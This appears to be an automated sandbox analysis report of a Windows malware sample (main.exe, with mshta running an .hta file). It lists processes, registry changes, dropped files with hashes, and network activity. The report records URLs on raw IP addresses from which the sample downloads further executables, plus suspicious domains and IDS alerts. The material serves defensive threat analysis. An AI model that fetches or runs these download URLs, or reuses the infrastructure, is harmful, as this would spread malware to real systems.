c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1136mshta.exe weseethebestthingswithbetterfuturegoodfor.htaC:\Windows\System32\mshta.exemain.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
522 916
Read events
520 092
Write events
2 590
Delete events
234

Modification events

(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000802E4
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(1936) Taskmgr.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:delete valueName:Preferences
Value:
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000602BE
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000005030A
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(1936) Taskmgr.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:writeName:Preferences
Value:
0D00000060000000600000006800000068000000E3010000DC010000000001000000008000000080D8010080DF010080000100016B00000034000000130300008C020000E80300000000000000000000000000000F000000010000000000000058AAEE82F77F00000000000000000000000000002E0100001E0000008990000000000000FF00000001015002000000000D0000000000000098AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008B900000010000000000000000101001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF780000001E0000008C900000020000000000000001021200000000000400000000000000C8AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008D900000030000000000000000011001000000000200000000000000E8AAEE82F77F00000000000000000000FFFFFFFF320000001E0000008A90000004000000000000000008200100000000050000000000000000ABEE82F77F00000000000000000000FFFFFFFFC80000001E0000008E90000005000000000000000001100100000000060000000000000028ABEE82F77F00000000000000000000FFFFFFFF040100001E0000008F90000006000000000000000001100100000000070000000000000050ABEE82F77F00000000000000000000FFFFFFFF49000000490000009090000007000000000000000004250000000000080000000000000080AAEE82F77F00000000000000000000FFFFFFFF49000000490000009190000008000000000000000004250000000000090000000000000070ABEE82F77F00000000000000000000FFFFFFFF490000004900000092900000090000000000000000042508000000000A0000000000000088ABEE82F77F00000000000000000000FFFFFFFF4900000049000000939000000A0000000000000000042508000000000B00000000000000A8ABEE82F77F00000000000000000000FFFFFFFF490000004900000039A000000B0000000000000000042509000000001C00000000000000C8ABEE82F77F00000000000000000000FFFFFFFFC8000000490000003AA000000C0000000000000000011009000000001D00000000000000F0ABEE82F77F00000000000000000000FFFFFFFF64000000490000004CA000000D0000000000000000021508000000001E0000000000000010ACEE82F77F00000000000000000000FFFFFFFF64000000490000004DA000000E000000000000000002150800000000030000000A000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000008990000000000000FF00000001015002000000000400000000000000C8AAEE82F77F0000000000000000000001000000960000001E0000008D900000010000000000000001011000000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C900000020000000000000000021000000000000C0000000000000040ACEE82F77F0000000000000000000003000000640000001E00000094900000030000000000000001021000000000000D0000000000000068ACEE82F77F00000000000000000000FFFFFFFF640000001E00000095900000040000000000000000011001000000000E0000000000000090ACEE82F77F0000000000000000000005000000320000001E00000096900000050000000000000001042001000000000F00000000000000B8ACEE82F77F0000000000000000000006000000320000001E00000097900000060000000000000001042001000000001000000000000000D8ACEE82F77F0000000000000000000007000000460000001E00000098900000070000000000000001011001000000001100000000000000F8ACEE82F77F00000000000000000000FFFFFFFF640000001E0000009990000008000000000000000001100100000000060000000000000028ABEE82F77F0000000000000000000009000000040100001E0000008F9000000900000000000000010110010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000B000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000009E90000000000000FF0000000101500200000000120000000000000020ADEE82F77F00000000000000000000FFFFFFFF2D0000001E0000009B90000001000000000000000004200100000000140000000000000040ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009D90000002000000000000000001100100000000130000000000000068ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009C900000030000000000000000011001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C90000004000000000000000102100000000000070000000000000050ABEE82F77F000000000000000000000500000049000000490000009090000005000000000000000104210000000000080000000000000080AAEE82F77F000000000000000000000600000049000000490000009190000006000000000000000104210000000000090000000000000070ABEE82F77F0000000000000000000007000000490000004900000092900000070000000000000001042108000000000A0000000000000088ABEE82F77F0000000000000000000008000000490000004900000093900000080000000000000001042108000000000B00000000000000A8ABEE82F77F0000000000000000000009000000490000004900000039A00000090000000000000001042109000000001C00000000000000C8ABEE82F77F000000000000000000000A00000064000000490000003AA000000A00000000000000000110090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000008000000010000000000000058AAEE82F77F0000000000000000000000000000C60000001E000000B090000000000000FF0000000101500200000000150000000000000088ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B1900000010000000000000000042500000000001600000000000000B8ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B2900000020000000000000000042500000000001800000000000000E0ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B490000003000000000000000004250000000000170000000000000008AEEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B390000004000000000000000004250000000000190000000000000040AEEE82F77F00000000000000000000FFFFFFFFA00000001E000000B5900000050000000000000000042001000000001A0000000000000070AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B6900000060000000000000000042001000000001B00000000000000A0AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B790000007000000000000000004200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA00000000000000000000000000000000000000000000009D200000200000009100000064000000320000006400000050000000320000003200000028000000500000003C0000005000000050000000320000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C00000050000000500000009700000032000000780000003200000050000000500000005000000050000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA000000000000000000000000000000000000009D200000200000009100000064000000320000009700000050000000320000003200000028000000500000003C000000500000005000000032000000500000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C0000005000000064000000780000003200000078000000780000003200000050000000500000005000000050000000C8000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C0000002D0000002E0000002F00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000002000000030000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000030276
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000030276
Operation:delete keyName:(default)
Value:
(PID) Process:(7208) Vb5HUIU.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Vb5HUIU_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7208) Vb5HUIU.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Vb5HUIU_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7208) Vb5HUIU.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Vb5HUIU_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
929
Suspicious files
149
Text files
413
Unknown types
108

Dropped files

PID
Process
Filename
Type
4772explorer.exeC:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datbinary
MD5:E49C56350AEDF784BFE00E444B879672
SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\VCRUNTIME140.dllexecutable
MD5:32DA96115C9D783A0769312C0482A62D
SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\_cffi_backend.cp313-win_amd64.pydexecutable
MD5:5CBA92E7C00D09A55F5CBADC8D16CD26
SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\_asyncio.pydexecutable
MD5:56F958EEBBC62305B4BF690D61C78E28
SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\_queue.pydexecutable
MD5:CC0F4A77CCFE39EFC8019FA8B74C06D0
SHA256:DEE7D19A9FCAB0DF043DC56F2CDC32F1A2A968AB229679B38B378C61CA0CBA53
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\api-ms-win-core-console-l1-1-0.dllexecutable
MD5:FC009A82F0FAB71E2C8ADF7F60F489C8
SHA256:D2ADD358A45999E95F67D923F1B4F5A27F5A1A895225121909D716EDF5AE13E7
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\_lzma.pydexecutable
MD5:D63E2E743EA103626D33B3C1D882F419
SHA256:7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\_decimal.pydexecutable
MD5:21FCB8E3D4310346A5DC1A216E7E23CA
SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\_ctypes.pydexecutable
MD5:29873384E13B0A78EE9857604161514B
SHA256:3CC8500A958CC125809B0467930EBCCE88A09DCC0CEDD7A45FACF3E332F7DB33
4984main.exeC:\Users\admin\AppData\Local\Temp\_MEI49842\api-ms-win-core-fibers-l1-1-0.dllexecutable
MD5:774133EFCABBCDD10DF784BB26804290
SHA256:B82B2D8E62011F2530F9B3FDEC55CF2869E4FB4133BDB6238BC0EA23FAE72661
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
730
TCP/UDP connections
22 384
DNS requests
590
Threats
2 741

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
424
main.exe
GET
35.159.177.27:80
http://35.159.177.27/02.08.2022.exe
unknown
unknown
424
main.exe
GET
185.156.72.2:80
http://185.156.72.2/files/1013240947/TlDiEq4.exe
unknown
unknown
424
main.exe
GET
185.156.72.2:80
http://185.156.72.2/files/7418301290/zxw4QU5.exe
unknown
unknown
424
main.exe
GET
200
185.156.72.61:80
http://185.156.72.61/inc/signed1221.exe
unknown
unknown
424
main.exe
GET
185.156.72.2:80
http://185.156.72.2/files/7726497892/uABfnaT.exe
unknown
unknown
424
main.exe
GET
200
185.156.72.2:80
http://185.156.72.2/files/5561582465/CQapnzM.exe
unknown
unknown
424
main.exe
GET
185.156.72.2:80
http://185.156.72.2/files/hofnar05/random.exe
unknown
unknown
424
main.exe
GET
200
185.156.72.61:80
http://185.156.72.61/inc/Windows.exe
unknown
unknown
424
main.exe
GET
185.156.72.2:80
http://185.156.72.2/files/6958565800/mY1SRsZ.exe
unknown
unknown
424
main.exe
GET
404
185.156.72.39:80
http://185.156.72.39/kkk.exe
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1268
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6368
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
424
main.exe
151.101.2.49:443
urlhaus.abuse.ch
FASTLY
US
whitelisted
424
main.exe
185.156.72.2:80
Tov Vaiz Partner
RU
unknown
424
main.exe
185.156.72.61:80
Tov Vaiz Partner
RU
unknown
424
main.exe
47.238.228.19:80
US
unknown
424
main.exe
188.114.97.3:443
desk-app-now.com
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.174
whitelisted
urlhaus.abuse.ch
  • 151.101.2.49
  • 151.101.194.49
  • 151.101.66.49
  • 151.101.130.49
whitelisted
desk-app-now.com
  • 188.114.97.3
  • 188.114.96.3
unknown
soap.apesirises.com
  • 172.67.173.230
  • 104.21.30.227
unknown
github.com
  • 140.82.121.3
  • 140.82.121.4
whitelisted
44.246.143.230.nip.io
  • 44.246.143.230
whitelisted
lomejordesalamanca.es
  • 188.164.198.15
unknown
idk.1f2e18bbde8ecc30ee3307a4.net
  • 193.24.123.68
unknown
objects.githubusercontent.com
  • 185.199.110.133
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.109.133
whitelisted

Threats

PID
Process
Class
Message
424
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
424
main.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
2200
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to nip .io Domain
424
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
424
main.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
424
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
424
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
424
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
424
main.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
424
main.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Process
Message
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\y2crqjmp.y5d directory exists )
Launcher_Start.exe
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Launcher_Start.exe
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Launcher_Start.exe
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Launcher_Start.exe
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Network.exe
CLR: Managed code called FailFast without specifying a reason.